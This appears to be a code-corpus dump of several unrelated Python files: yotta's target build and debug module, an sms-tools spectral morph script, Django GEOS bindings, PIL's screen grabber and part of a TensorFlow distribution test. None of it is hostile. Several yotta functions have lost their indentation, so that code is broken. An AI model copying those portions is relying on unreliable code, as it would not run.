    is_computed = True

    def __init__(self, col, sample=False, **extra):
        super(Variance, self).__init__(col, **extra)
        if sample:
            self.sql_function = 'VAR_SAMP'
        else:
            self.sql_function = 'VAR_POP'
| bsd-3-clause |
eyeye/yotta | yotta/lib/target.py | 1 | 24641 | # Copyright 2014-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
# standard library modules, , ,
import os
import signal
import subprocess
import logging
import string
import traceback
import errno
import itertools
import shlex
from collections import OrderedDict
# Ordered JSON, , read & write json, internal
import ordered_json
# access, , get components, internal
import access
import access_common
# Pack, , common parts of Components/Targets, internal
import pack
# fsutils, , misc filesystem utils, internal
import fsutils
# File/registry naming conventions for yotta targets:
Target_Description_File = 'target.json'  # per-target description file
App_Config_File = 'config.json'          # optional application-level config overlay
Registry_Namespace = 'targets'           # namespace used in the yotta registry
# JSON schema used to validate target descriptions (ships alongside this module):
Schema_File = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'schema', 'target.json')

logger = logging.getLogger('target')
def _ignoreSignal(signum, frame):
    ''' Signal handler that swallows the signal, logging the signal number
        and the interrupted stack at debug level for diagnosis.
    '''
    interrupted_stack = ''.join(
        traceback.format_list(traceback.extract_stack(frame))
    )
    logger.debug('ignoring signal %s, traceback:\n%s' % (signum, interrupted_stack))
def _newPGroup():
    # Put the calling process into its own process group. Presumably used as
    # a subprocess preexec_fn so child processes don't share our signal
    # group -- TODO confirm against callers. NOTE(review): POSIX-only
    # (os.setpgrp does not exist on Windows).
    os.setpgrp()
def _mergeDictionaries(*args):
''' merge dictionaries of dictionaries recursively, with elements from
dictionaries earlier in the argument sequence taking precedence
'''
# to support merging of OrderedDicts, copy the result type from the first
# argument:
result = type(args[0])()
for k, v in itertools.chain(*[x.items() for x in args]):
if not k in result:
result[k] = v
elif isinstance(result[k], dict) and isinstance(v, dict):
result[k] = _mergeDictionaries(result[k], v)
return result
# API
def getDerivedTarget(
        target_name_and_version,
        targets_path,
        application_dir = None,
        install_missing = True,
        update_installed = False
    ):
    ''' Get the specified target description, optionally ensuring that it (and
        all dependencies) are installed in targets_path.

        `target_name_and_version` is either "name" or "name,version-spec".
        `application_dir`, if given, is searched for an optional config.json
        whose contents override the targets' own config.

        Returns (DerivedTarget, errors), or (None, errors) if the leaf target
        could not be found/installed.
    '''
    logger.debug('satisfy target: %s' % target_name_and_version);
    # the target may be specified as "name,version-spec" in one argument:
    if ',' in target_name_and_version:
        name, ver = target_name_and_version.split(',')
        dspec = pack.DependencySpec(name, ver)
    else:
        dspec = pack.DependencySpec(target_name_and_version, "*")

    leaf_target = None
    previous_name = dspec.name
    search_dirs = [targets_path]
    target_hierarchy = []
    errors = []
    # walk the inheritance chain from the most-derived (leaf) target down to
    # its ultimate base, resolving/installing each target in turn:
    while True:
        t = None
        try:
            if install_missing:
                t = access.satisfyVersion(
                    name = dspec.name,
                    version_required = dspec.version_req,
                    available = target_hierarchy,
                    search_paths = search_dirs,
                    working_directory = targets_path,
                    update_installed = ('Update' if update_installed else None),
                    type = 'target'
                )
            else:
                t = access.satisfyVersionFromSearchPaths(
                    name = dspec.name,
                    version_required = dspec.version_req,
                    search_paths = search_dirs,
                    type = 'target'
                )
        except access_common.Unavailable as e:
            # remember the failure; the caller decides how fatal it is
            errors.append(e)
        if not t:
            if install_missing:
                logger.error(
                    'could not install target %s for %s' %
                    (dspec, previous_name)
                )
            break
        else:
            target_hierarchy.append(t)
            previous_name = dspec.name
            assert(isinstance(t, Target))
            # follow this target's "inherits" link, if any:
            dspec = t.baseTargetSpec() #pylint: disable=no-member
            if not leaf_target:
                leaf_target = t
        if dspec is None:
            # reached a target with no base: chain complete
            break
    if leaf_target is None:
        return (None, errors)
    # if we have a valid target, try to load the app-specific config data (if
    # any):
    app_config = {}
    if application_dir is not None:
        app_config_fname = os.path.join(application_dir, App_Config_File)
        if os.path.exists(app_config_fname):
            try:
                app_config = ordered_json.load(app_config_fname)
            except Exception as e:
                errors.append(Exception("Invalid application config.json: %s" % (e)))
    # target_hierarchy[0] is the leaf itself, so only pass its bases on:
    return (DerivedTarget(leaf_target, target_hierarchy[1:], app_config), errors)
class Target(pack.Pack):
    ''' A single target description loaded from a directory containing a
        target.json file.
    '''
    def __init__(self, path, installed_linked=False, latest_suitable_version=None):
        ''' Initialise a Target based on a directory. If the directory does
            not contain a valid target.json file the initialised object will
            test false, and will contain an error property describing the
            failure.
        '''
        super(Target, self).__init__(
            path,
            description_filename=Target_Description_File,
            installed_linked=installed_linked,
            schema_filename=Schema_File,
            latest_suitable_version=latest_suitable_version
        )

    def baseTargetSpec(self):
        ''' Return a pack.DependencySpec for the (single) base target that
            this target inherits from, or None if it has no base target.
        '''
        inherits = self.description.get('inherits', {})
        if len(inherits) > 1:
            logger.error('target %s specifies multiple base targets, but only one is allowed', self.getName())
            return None
        # at most one entry: return a spec for it, if present
        for base_name, base_version_req in inherits.items():
            return pack.DependencySpec(base_name, base_version_req)
        return None

    def getRegistryNamespace(self):
        # targets live under their own namespace in the yotta registry
        return Registry_Namespace

    def getConfig(self):
        ''' Return the (possibly empty) "config" section of the description. '''
        return self.description.get('config', OrderedDict())
class DerivedTarget(Target):
def __init__(self, leaf_target, base_targets, app_config):
''' Initialise a DerivedTarget (representing an inheritance hierarchy of
Targets.), given the most-derived Target description, and a set of
available Targets to compose the rest of the lineage from.
DerivedTarget provides build & debug commands, and access to the
derived target config info (merged with the application config
info from config.json, if any).
It's possible to update the application config for an existing
DerivedTarget instance.
DerivedTarget can also be used as a stand-in for the most-derived
(leaf) target in the inheritance hierarchy.
'''
# initialise the base class as a copy of leaf_target
super(DerivedTarget, self).__init__(
path = leaf_target.path,
installed_linked = leaf_target.installed_linked,
latest_suitable_version = leaf_target.latest_suitable_version
)
self.hierarchy = [leaf_target] + base_targets[:]
self.config = None
self.app_config = app_config
# override truthiness to test validity of the entire hierarchy:
def __nonzero__(self):
for t in self.hierarchy:
if not t: return False
return bool(len(self.hierarchy))
    def __bool__(self):
        # Python 3 spelling of __nonzero__: truthiness = whole hierarchy valid
        return self.__nonzero__()
def _loadConfig(self):
''' load the configuration information from the target hierarchy '''
config_dicts = [self.app_config] + [t.getConfig() for t in self.hierarchy]
self.config = _mergeDictionaries(*config_dicts)
# note that backwards compatibility with the "similarTo" data that used
# to be used for target-dependencies is ensured at the point of use. We
# don't merge similarTo into the config because it might break things.
    def _ensureConfig(self):
        # lazily compute the merged config the first time it's needed
        if self.config is None:
            self._loadConfig()
    def setApplicationConfig(self, config):
        ''' set the application-config data to the contents of the
            dictionary-like object `config`
        '''
        self.app_config = config
        # re-merge eagerly so self.config immediately reflects the new data
        self._loadConfig()
def getConfigValue(self, conf_key):
self._ensureConfig()
key_path = conf_key.split('.');
c = self.config
for part in key_path:
if part in c:
c = c[part]
else:
return None
return c
def getSimilarTo_Deprecated(self):
r = []
for t in self.hierarchy:
r.append(t.getName())
r += t.description.get('similarTo', [])
return r
    def getMergedConfig(self):
        ''' Return the merged configuration: the application config overlaid
            on each target's config, most-derived taking precedence. '''
        self._ensureConfig()
        return self.config
def getToolchainFiles(self):
return [
os.path.join(x.path, x.description['toolchain']) for x in self.hierarchy if 'toolchain' in x.description
]
    @classmethod
    def addBuildOptions(cls, parser):
        # Register the CMake-generator choice on an argparse parser; the
        # accepted values mirror the generators handled elsewhere in this
        # class (overrideBuildCommand / hintForCMakeGenerator).
        parser.add_argument('-G', '--cmake-generator', dest='cmake_generator',
           default='Ninja',
           choices=(
               'Unix Makefiles',
               'Ninja',
               'Xcode',
               'Sublime Text 2 - Ninja',
               'Sublime Text 2 - Unix Makefiles'
           )
        )
@classmethod
def overrideBuildCommand(cls, generator_name, targets=None):
if targets is None:
targets = []
# when we build using cmake --build, the nice colourised output is lost
# - so override with the actual build command for command-line
# generators where people will care:
try:
r = {
'Unix Makefiles': ['make'],
'Ninja': ['ninja']
}[generator_name]
# all of the above build programs take the build targets (e.g.
# "all") as the last arguments
if targets is not None:
r += targets
return r
except KeyError:
return None
def hintForCMakeGenerator(self, generator_name, component):
try:
name = self.getName()
component_name = component.getName()
return {
'Xcode':
'to open the built project, run:\nopen ./build/%s/%s.xcodeproj' % (name, component_name),
'Sublime Text 2 - Ninja':
'to open the built project, run:\nopen ./build/%s/%s.??' % (name, component_name),
'Sublime Text 2 - Unix Makefiles':
'to open the built project, run:\nopen ./build/%s/%s.??' % (name, component_name)
}[generator_name]
except KeyError:
return None
    def exec_helper(self, cmd, builddir):
        ''' Execute the given command (a list of arguments) in `builddir`,
            returning an error message string if an error occurred, or None
            if the command was successful. '''
        try:
            child = subprocess.Popen(cmd, cwd=builddir)
            child.wait()
        except OSError as e:
            if e.errno == errno.ENOENT:
                # the executable itself was not found: give an actionable
                # message, with a special case for the cmake prerequisite
                if cmd[0] == 'cmake':
                    return 'CMake is not installed, please follow the installation instructions at http://docs.yottabuild.org/#installing'
                else:
                    return '%s is not installed' % (cmd[0])
            else:
                return 'command %s failed' % (cmd)
        # non-zero exit status also counts as failure:
        if child.returncode:
            return 'command %s failed' % (cmd)
    @fsutils.dropRootPrivs
    def build(self, builddir, component, args, release_build=False, build_args=None, targets=None):
        ''' Execute the commands necessary to build this component, and all of
            its dependencies.

            Runs cmake configure in `builddir`, then the native build command
            (or `cmake --build`). Returns an error-message string on failure,
            None on success. `args.cmake_generator` selects the generator;
            `build_args` are appended to the build command; `targets` names
            the build targets to build.
        '''
        if build_args is None:
            build_args = []
        if targets is None:
            targets = []
        # in the future this may be specified in the target description, but
        # for now we only support cmake, so everything is simple:
        build_type = ('Debug', 'RelWithDebInfo')[release_build]
        if build_type:
            cmd = ['cmake', '-D', 'CMAKE_BUILD_TYPE=%s' % build_type, '-G', args.cmake_generator, '.']
        else:
            cmd = ['cmake', '-G', args.cmake_generator, '.']
        res = self.exec_helper(cmd, builddir)
        if res is not None:
            return res
        # cmake error: the generated Ninja build file will not work on windows when arguments are read from
        # a file (@file) instead of the command line, since '\' in @file is interpreted as an escape sequence.
        # !!! FIXME: remove this once http://www.cmake.org/Bug/view.php?id=15278 is fixed!
        if args.cmake_generator == "Ninja" and os.name == 'nt':
            logger.debug("Converting back-slashes in build.ninja to forward-slashes")
            build_file = os.path.join(builddir, "build.ninja")
            # We want to convert back-slashes to forward-slashes, except in macro definitions, such as
            # -DYOTTA_COMPONENT_VERSION = \"0.0.1\". So we use a little trick: first we change all \"
            # strings to an unprintable ASCII char that can't appear in build.ninja (in this case \1),
            # then we convert all the back-slashed to forward-slashes, then we convert '\1' back to \".
            try:
                f = open(build_file, "r+t")
                data = f.read()
                data = data.replace('\\"', '\1')
                data = data.replace('\\', '/')
                data = data.replace('\1', '\\"')
                f.seek(0)
                f.write(data)
                f.close()
            except:
                return 'Unable to update "%s", aborting' % build_file
        # prefer the generator's own build tool (nicer output) when we know it:
        build_command = self.overrideBuildCommand(args.cmake_generator, targets=targets)
        if build_command:
            cmd = build_command + build_args
        else:
            cmd = ['cmake', '--build', builddir]
            if len(targets):
                # !!! FIXME: support multiple targets with the default CMake
                # build command
                cmd += ['--target', targets[0]]
            cmd += build_args
        res = self.exec_helper(cmd, builddir)
        if res is not None:
            return res
        # for IDE generators, tell the user how to open the project:
        hint = self.hintForCMakeGenerator(args.cmake_generator, component)
        if hint:
            logger.info(hint)
    def findProgram(self, builddir, program):
        ''' Return the builddir-relative path of program, if only a partial
            path is specified. Returns None and logs an error message if the
            program is ambiguous or not found.

            Matching passes, in order of preference: exact path, exact file
            name anywhere in the tree, case-insensitive name match, then an
            approximate (substring, extension-stripped) match.
        '''
        # if this is an exact match, do no further checking:
        if os.path.isfile(os.path.join(builddir, program)):
            # NOTE(review): uses the root logger (logging.info) rather than
            # this module's `logger`, unlike the rest of the file -- confirm
            # whether that is intentional.
            logging.info('found %s' % program)
            return program
        exact_matches = []
        insensitive_matches = []
        approx_matches = []
        # single walk of the build tree collects candidates for all passes:
        for path, dirs, files in os.walk(builddir):
            if program in files:
                exact_matches.append(os.path.relpath(os.path.join(path, program), builddir))
                continue
            files_lower = [f.lower() for f in files]
            if program.lower() in files_lower:
                insensitive_matches.append(
                    os.path.relpath(
                        os.path.join(path, files[files_lower.index(program.lower())]),
                        builddir
                    )
                )
                continue
            # !!! TODO: in the future add approximate string matching (typos,
            # etc.), for now we just test stripping any paths off program, and
            # looking for substring matches:
            pg_basen_lower_noext = os.path.splitext(os.path.basename(program).lower())[0]
            for f in files_lower:
                if pg_basen_lower_noext in f:
                    approx_matches.append(
                        os.path.relpath(
                            os.path.join(path, files[files_lower.index(f)]),
                            builddir
                        )
                    )
        if len(exact_matches) == 1:
            logging.info('found %s at %s', program, exact_matches[0])
            return exact_matches[0]
        elif len(exact_matches) > 1:
            # ambiguous: refuse to guess, list the candidates instead
            logging.error(
                '%s matches multiple executables, please use a full path (one of %s)' % (
                    program,
                    ', or '.join(['"'+os.path.join(m, program)+'"' for m in exact_matches])
                )
            )
            return None
        # if we have matches with and without a file extension, prefer the
        # no-file extension version, and discard the others (so we avoid
        # picking up post-processed files):
        reduced_approx_matches = []
        for m in approx_matches:
            root = os.path.splitext(m)[0]
            if (m == root) or (root not in approx_matches):
                reduced_approx_matches.append(m)
        approx_matches = reduced_approx_matches

        # fall back through the weaker match passes, preferring the stronger:
        for matches in (insensitive_matches, approx_matches):
            if len(matches) == 1:
                logging.info('found %s at %s' % (
                    program, matches[0]
                ))
                return matches[0]
            elif len(matches) > 1:
                logging.error(
                    '%s is similar to several executables found. Please use an exact name:\n%s' % (
                        program,
                        '\n'.join(matches)
                    )
                )
                return None
        logging.error('could not find program "%s" to debug' % program)
        return None
def debug(self, builddir, program):
''' Launch a debugger for the specified program. Uses the `debug`
script if specified by the target, falls back to the `debug` and
`debugServer` commands if not. `program` is inserted into the
$program variable in commands.
'''
try:
signal.signal(signal.SIGINT, _ignoreSignal);
if 'scripts' in self.description and 'debug' in self.description['scripts']:
return self._debugWithScript(builddir, program)
elif 'debug' in self.description:
logger.warning(
'target %s provides deprecated debug property. It should '+
'provide script.debug instead.', self.getName()
)
return self._debugDeprecated(builddir, program)
else:
return "Target %s does not specify debug commands" % self
finally:
# clear the sigint handler
signal.signal(signal.SIGINT, signal.SIG_DFL);
@fsutils.dropRootPrivs
def _debugWithScript(self, builddir, program):
child = None
try:
prog_path = prog_path = self.findProgram(builddir, program)
if prog_path is None:
return
cmd = [
os.path.expandvars(string.Template(x).safe_substitute(program=prog_path))
for x in self.description['scripts']['debug']
]
logger.debug('starting debugger: %s', cmd)
child = subprocess.Popen(
cmd, cwd = builddir
)
child.wait()
if child.returncode:
return "debug process exited with status %s" % child.returncode
child = None
except:
# reset the terminal, in case the debugger has screwed it up
os.system('reset')
raise
finally:
if child is not None:
try:
child.terminate()
except OSError as e:
pass
@fsutils.dropRootPrivs
def _debugDeprecated(self, builddir, program):
prog_path = self.findProgram(builddir, program)
if prog_path is None:
return
with open(os.devnull, "w") as dev_null:
daemon = None
child = None
try:
# debug-server is the old name, debugServer is the new name
debug_server_prop = 'debugServer'
if not debug_server_prop in self.description:
debug_server_prop = 'debug-server'
if debug_server_prop in self.description:
logger.debug('starting debug server...')
daemon = subprocess.Popen(
self.description[debug_server_prop],
cwd = builddir,
stdout = dev_null,
stderr = dev_null,
preexec_fn = _newPGroup
)
else:
daemon = None
cmd = [
os.path.expandvars(string.Template(x).safe_substitute(program=prog_path))
for x in self.description['debug']
]
logger.debug('starting debugger: %s', cmd)
child = subprocess.Popen(
cmd, cwd = builddir
)
child.wait()
if child.returncode:
return "debug process executed with status %s" % child.returncode
child = None
except:
# reset the terminal, in case the debugger has screwed it up
os.system('reset')
raise
finally:
if child is not None:
try:
child.terminate()
except OSError as e:
pass
if daemon is not None:
logger.debug('shutting down debug server...')
try:
daemon.terminate()
except OSError as e:
pass
    @fsutils.dropRootPrivs
    def test(self, cwd, test_command, filter_command, forward_args):
        """Run `test_command` in `cwd`, optionally piping its stdout
        through `filter_command`, and return 0 on pass, 1 on fail.

        If the target defines `scripts.test`, each element has $program
        substituted with the (./-prefixed) test command and
        `forward_args` are appended; otherwise the command is run
        directly. When a filter is used, the *filter's* exit status
        decides pass/fail.
        """
        # we assume that test commands are relative to the current directory.
        test_command = './' + test_command
        if not ('scripts' in self.description and 'test' in self.description['scripts']):
            cmd = shlex.split(test_command)
        else:
            cmd = [
                os.path.expandvars(string.Template(x).safe_substitute(program=test_command))
                for x in self.description['scripts']['test']
            ] + forward_args
        # Track live children so the finally block can reap them on any
        # early exit; each is reset to None once it has finished cleanly.
        test_child = None
        test_filter = None
        try:
            logger.debug('running test: %s', cmd)
            if filter_command:
                logger.debug('using output filter command: %s', filter_command)
                # Pipe the test's stdout into the filter process.
                test_child = subprocess.Popen(
                    cmd, cwd = cwd, stdout = subprocess.PIPE
                )
                try:
                    test_filter = subprocess.Popen(
                        filter_command, cwd = cwd, stdin = test_child.stdout
                    )
                except OSError as e:
                    logger.error('error starting test output filter "%s": %s', filter_command, e)
                    test_child.terminate()
                    return 1
                # Wait for the filter to finish, then stop the test
                # process (it may run forever on embedded targets).
                test_filter.communicate()
                test_child.terminate()
                test_child.stdout.close()
                returncode = test_filter.returncode
                test_child = None
                test_filter = None
                if returncode:
                    logger.debug("test filter exited with status %s (=fail)", returncode)
                    return 1
            else:
                try:
                    test_child = subprocess.Popen(
                        cmd, cwd = cwd
                    )
                except OSError as e:
                    # Give a friendlier message for a missing executable.
                    if e.errno == errno.ENOENT:
                        logger.error('Error: no such file or directory: "%s"', cmd[0])
                        return 1
                    raise
                test_child.wait()
                returncode = test_child.returncode
                test_child = None
                if returncode:
                    logger.debug("test process exited with status %s (=fail)", returncode)
                    return 1
        finally:
            # Terminate anything still running (exception or early return).
            if test_child is not None:
                test_child.terminate()
            if test_filter is not None:
                test_filter.terminate()
        logger.debug("test %s passed", test_command)
        return 0
| apache-2.0 |
zymsys/sms-tools | lectures/08-Sound-transformations/plots-code/stftMorph-frame.py | 21 | 2700 | import numpy as np
import time, os, sys
import matplotlib.pyplot as plt
from scipy.signal import hamming, resample
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../../software/models/'))
import dftModel as DFT
import utilFunctions as UF
import math
# --- analysis setup: load the two sounds and pick one frame from each ---
(fs, x1) = UF.wavread('../../../sounds/orchestra.wav')
(fs, x2) = UF.wavread('../../../sounds/speech-male.wav')
w1 = np.hamming(1024)
N1 = 1024
H1 = 256
w2 = np.hamming(1024)
N2 = 1024
smoothf = .1    # fraction of spectrum kept when smoothing mX2 (0..1)
balancef = .7   # morph balance: 1.0 = all mX2, 0.0 = all mX1
M1 = w1.size # size of analysis window
hM1_1 = int(math.floor((M1+1)/2)) # half analysis window size by rounding
hM1_2 = int(math.floor(M1/2)) # half analysis window size by floor
M2 = w2.size # size of analysis window
hM2_1 = int(math.floor((M2+1)/2)) # half analysis window size by rounding
hM2_2 = int(math.floor(M2/2)) # half analysis window size by floor2
loc1 = 14843  # sample index of the analysed frame in orchestra.wav
loc2 = 9294   # sample index of the analysed frame in speech-male.wav
x1 = x1[loc1-hM1_1:loc1+hM1_2]
x2 = x2[loc2-hM2_1:loc2+hM2_2]
mX1, pX1 = DFT.dftAnal(x1, w1, N1) # compute dft
mX2, pX2 = DFT.dftAnal(x2, w2, N2) # compute dft
# morph: smooth the second magnitude spectrum (downsample then upsample),
# then mix the two magnitude spectra according to balancef
mX2smooth = resample(np.maximum(-200, mX2), mX2.size*smoothf) # smooth spectrum of second sound
mX2 = resample(mX2smooth, mX2.size)
mY = balancef * mX2 + (1-balancef) * mX1 # generate output spectrum
#-----synthesis-----
# resynthesize using the morphed magnitudes and the phase of sound 1
y = DFT.dftSynth(mY, pX1, M1) * sum(w1) # overlap-add to generate output sound
mY1, pY1 = DFT.dftAnal(y, w1, M1) # overlap-add to generate output sound
# --- plotting: inputs on the left column, morphed output on the right ---
plt.figure(1, figsize=(12, 9))
plt.subplot(321)
plt.plot(np.arange(N1)/float(fs), x1*w1, 'b', lw=1.5)
plt.axis([0, N1/float(fs), min(x1*w1), max(x1*w1)])
plt.title('x1 (orchestra.wav)')
plt.subplot(323)
plt.plot(fs*np.arange(mX1.size)/float(mX1.size), mX1-max(mX1), 'r', lw=1.5, label = 'mX1')
plt.plot(fs*np.arange(mX2.size)/float(mX2.size), mX2-max(mX2), 'k', lw=1.5, label='mX2')
plt.legend(prop={'size':10})
plt.axis([0,fs/4.0,-70,2])
plt.title('mX1 + mX2 (speech-male.wav)')
plt.subplot(325)
plt.plot(fs*np.arange(pX1.size)/float(pX1.size), pX1, 'c', lw=1.5)
plt.axis([0,fs/4.0,min(pX1),20])
plt.title('pX1')
plt.subplot(322)
plt.plot(np.arange(N1)/float(fs), y, 'b', lw=1.5)
plt.axis([0, float(N1)/fs, min(y), max(y)])
plt.title('y')
plt.subplot(324)
plt.plot(fs*np.arange(mY1.size)/float(mY1.size), mY1-max(mY1), 'r', lw=1.5)
plt.axis([0,fs/4.0,-70,2])
plt.title('mY')
plt.subplot(326)
plt.plot(fs*np.arange(pY1.size)/float(pY1.size), pY1, 'c', lw=1.5)
plt.axis([0,fs/4.0,min(pY1),6])
plt.title('pY')
plt.tight_layout()
plt.savefig('stftMorph-frame.png')
plt.show()
| agpl-3.0 |
rizumu/django | django/contrib/gis/geos/prototypes/prepared.py | 288 | 1214 | from ctypes import c_char
from django.contrib.gis.geos.libgeos import (
GEOM_PTR, PREPGEOM_PTR, GEOSFuncFactory,
)
from django.contrib.gis.geos.prototypes.errcheck import check_predicate
# Prepared geometry constructor and destructors.
geos_prepare = GEOSFuncFactory('GEOSPrepare', argtypes=[GEOM_PTR], restype=PREPGEOM_PTR)
# Fix: the keyword was misspelled "argtpes", so the destructor's ctypes
# argument types were silently never registered.
prepared_destroy = GEOSFuncFactory('GEOSPreparedGeom_destroy', argtypes=[PREPGEOM_PTR])
# Prepared geometry binary predicate support.
class PreparedPredicate(GEOSFuncFactory):
    """Factory for GEOS binary predicates on a prepared geometry.

    Each wrapped C function takes (prepared geometry, geometry) and
    returns a single byte; check_predicate converts that byte into a
    Python bool and raises on a GEOS error code.
    """
    argtypes = [PREPGEOM_PTR, GEOM_PTR]
    restype = c_char
    errcheck = staticmethod(check_predicate)
# Prepared-geometry spatial predicates (available in all supported GEOS
# versions).
prepared_contains = PreparedPredicate('GEOSPreparedContains')
prepared_contains_properly = PreparedPredicate('GEOSPreparedContainsProperly')
prepared_covers = PreparedPredicate('GEOSPreparedCovers')
prepared_intersects = PreparedPredicate('GEOSPreparedIntersects')
# Functions added in GEOS 3.3
prepared_crosses = PreparedPredicate('GEOSPreparedCrosses')
prepared_disjoint = PreparedPredicate('GEOSPreparedDisjoint')
prepared_overlaps = PreparedPredicate('GEOSPreparedOverlaps')
prepared_touches = PreparedPredicate('GEOSPreparedTouches')
prepared_within = PreparedPredicate('GEOSPreparedWithin')
mollstam/UnrealPy | UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/Pillow-2.9.0/PIL/ImageGrab.py | 52 | 1218 | #
# The Python Imaging Library
# $Id$
#
# screen grabber (windows only)
#
# History:
# 2001-04-26 fl created
# 2001-09-17 fl use builtin driver, if present
# 2002-11-19 fl added grabclipboard support
#
# Copyright (c) 2001-2002 by Secret Labs AB
# Copyright (c) 2001-2002 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from PIL import Image
import sys
# Fail fast at import time: both screen-grab drivers below exist only on
# Windows.
if sys.platform != "win32":
    raise ImportError("ImageGrab is Windows only")
# Pick whichever screen-grab driver is available; both expose the same
# callable returning (size, raw BGR pixel data).
try:
    # built-in driver (1.1.3 and later)
    grabber = Image.core.grabscreen
except AttributeError:
    # stand-alone driver (pil plus)
    import _grabscreen
    grabber = _grabscreen.grab
def grab(bbox=None):
    """Take a screenshot and return it as an RGB Image.

    If *bbox* is given it is a 4-tuple (left, upper, right, lower) and
    the result is cropped to that region.
    """
    size, data = grabber()
    im = Image.frombytes(
        "RGB", size, data,
        # RGB, 32-bit line padding, origo in lower left corner
        # (size[0]*3 + 3) & -4 rounds the BGR row length up to a multiple
        # of 4 bytes (DIB scanline alignment); stride -1 flips the
        # bottom-up rows to top-down.
        "raw", "BGR", (size[0]*3 + 3) & -4, -1
    )
    if bbox:
        im = im.crop(bbox)
    return im
def grabclipboard():
    """Return the clipboard contents.

    Returns an Image for bitmap data (decoded as a BMP/DIB), a list of
    filenames for a file-drop, or None if the clipboard holds neither.
    """
    debug = 0  # temporary interface
    data = Image.core.grabclipboard(debug)
    if isinstance(data, bytes):
        # Raw DIB data: wrap it in a file object and decode via the BMP
        # plugin's DIB reader.
        from PIL import BmpImagePlugin
        import io
        return BmpImagePlugin.DibImageFile(io.BytesIO(data))
    return data
| mit |
vrv/tensorflow | tensorflow/contrib/distributions/python/kernel_tests/transformed_distribution_test.py | 74 | 12624 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for TransformedDistribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import stats
from tensorflow.contrib import distributions
from tensorflow.contrib import linalg
from tensorflow.contrib.distributions.python.ops import bijectors
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
bs = bijectors
ds = distributions
la = linalg
class TransformedDistributionTest(test.TestCase):
  """Tests TransformedDistribution against scipy reference distributions."""

  def _cls(self):
    # Indirection point so subclasses can rerun these tests against a
    # different distribution class.
    return ds.TransformedDistribution
  def testTransformedDistribution(self):
    # Exp(Normal(mu, sigma)) must match scipy's lognorm for sampling,
    # densities and (log) cdf / survival functions.
    g = ops.Graph()
    with g.as_default():
      mu = 3.0
      sigma = 2.0
      # Note: the Jacobian callable only works for this example; more generally
      # you may or may not need a reduce_sum.
      log_normal = self._cls()(
          distribution=ds.Normal(loc=mu, scale=sigma),
          bijector=bs.Exp(event_ndims=0))
      sp_dist = stats.lognorm(s=sigma, scale=np.exp(mu))
      # sample
      sample = log_normal.sample(100000, seed=235)
      self.assertAllEqual([], log_normal.event_shape)
      with self.test_session(graph=g):
        self.assertAllEqual([], log_normal.event_shape_tensor().eval())
        self.assertAllClose(
            sp_dist.mean(), np.mean(sample.eval()), atol=0.0, rtol=0.05)
      # pdf, log_pdf, cdf, etc...
      # The mean of the lognormal is around 148.
      test_vals = np.linspace(0.1, 1000., num=20).astype(np.float32)
      for func in [[log_normal.log_prob, sp_dist.logpdf],
                   [log_normal.prob, sp_dist.pdf],
                   [log_normal.log_cdf, sp_dist.logcdf],
                   [log_normal.cdf, sp_dist.cdf],
                   [log_normal.survival_function, sp_dist.sf],
                   [log_normal.log_survival_function, sp_dist.logsf]]:
        actual = func[0](test_vals)
        expected = func[1](test_vals)
        with self.test_session(graph=g):
          self.assertAllClose(expected, actual.eval(), atol=0, rtol=0.01)
  def testCachedSamplesWithoutInverse(self):
    # log_prob of a value produced by sample() should use the cached
    # pre-image rather than inverting the bijector.
    with self.test_session() as sess:
      mu = 3.0
      sigma = 0.02
      log_normal = self._cls()(
          distribution=ds.Normal(loc=mu, scale=sigma),
          bijector=bs.Exp(event_ndims=0))
      sample = log_normal.sample(1)
      sample_val, log_pdf_val = sess.run([sample, log_normal.log_prob(sample)])
      self.assertAllClose(
          stats.lognorm.logpdf(sample_val, s=sigma, scale=np.exp(mu)),
          log_pdf_val,
          atol=1e-2)
  def testShapeChangingBijector(self):
    # SoftmaxCentered maps scalar events to vector events; check densities
    # and the enlarged sample/event shapes.
    with self.test_session():
      softmax = bs.SoftmaxCentered()
      standard_normal = ds.Normal(loc=0., scale=1.)
      multi_logit_normal = self._cls()(
          distribution=standard_normal,
          bijector=softmax)
      x = [[-np.log(3.), 0.],
           [np.log(3), np.log(5)]]
      y = softmax.forward(x).eval()
      expected_log_pdf = (stats.norm(loc=0., scale=1.).logpdf(x) -
                          np.sum(np.log(y), axis=-1))
      self.assertAllClose(expected_log_pdf,
                          multi_logit_normal.log_prob(y).eval())
      self.assertAllClose(
          [1, 2, 3, 2],
          array_ops.shape(multi_logit_normal.sample([1, 2, 3])).eval())
      self.assertAllEqual([2], multi_logit_normal.event_shape)
      self.assertAllEqual([2], multi_logit_normal.event_shape_tensor().eval())
  def testEntropy(self):
    # Entropy of an affine-transformed standard MVN must match scipy's
    # entropy for the equivalent diagonal-covariance MVN.
    with self.test_session():
      shift = np.array([[-1, 0, 1], [-1, -2, -3]], dtype=np.float32)
      diag = np.array([[1, 2, 3], [2, 3, 2]], dtype=np.float32)
      actual_mvn_entropy = np.concatenate([
          [stats.multivariate_normal(shift[i], np.diag(diag[i]**2)).entropy()]
          for i in range(len(diag))])
      fake_mvn = self._cls()(
          ds.MultivariateNormalDiag(
              loc=array_ops.zeros_like(shift),
              scale_diag=array_ops.ones_like(diag),
              validate_args=True),
          bs.AffineLinearOperator(
              shift,
              scale=la.LinearOperatorDiag(diag, is_non_singular=True),
              validate_args=True),
          validate_args=True)
      self.assertAllClose(actual_mvn_entropy,
                          fake_mvn.entropy().eval())
class ScalarToMultiTest(test.TestCase):
  """Tests batch_shape/event_shape overrides on TransformedDistribution.

  A scalar (or partially scalar) base distribution is expanded via the
  overrides and an Affine bijector into something that must behave like
